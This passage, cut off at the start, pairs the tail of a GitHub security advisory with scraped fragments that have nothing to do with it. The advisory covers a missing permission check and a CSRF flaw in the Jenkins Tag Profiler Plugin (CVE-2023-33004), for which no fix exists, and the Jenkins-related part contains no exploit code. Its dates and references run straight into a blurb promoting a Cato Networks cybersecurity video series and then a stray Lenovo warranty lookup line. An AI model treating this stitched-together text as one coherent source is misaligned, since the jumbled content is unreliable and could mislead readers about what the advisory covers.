Additionally, this HTTP endpoint does not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

As of publication of this advisory, there is no fix.

**References**

*   https://nvd.nist.gov/vuln/detail/CVE-2023-33004
*   https://www.jenkins.io/security/advisory/2023-05-16/#SECURITY-3083

Published to the GitHub Advisory Database

May 16, 2023

Reviewed

May 17, 2023

Last updated

May 17, 2023

GHSA-cpc3-gm2x-mrvp: Jenkins Tag Profiler Plugin missing permission check

Since cybersecurity is definitely an issue that’s here to stay, I’ve just checked out the recently released first episodes of Cato Networks Cybersecurity Master Class Series.  According to Cato, the series aims to teach and demonstrate cybersecurity tools and best practices; provide research and real-world case studies on cybersecurity; and bring the voices and opinions of top cybersecurity

Search

lenovo warranty check/lookup | check warranty status | lenovo support us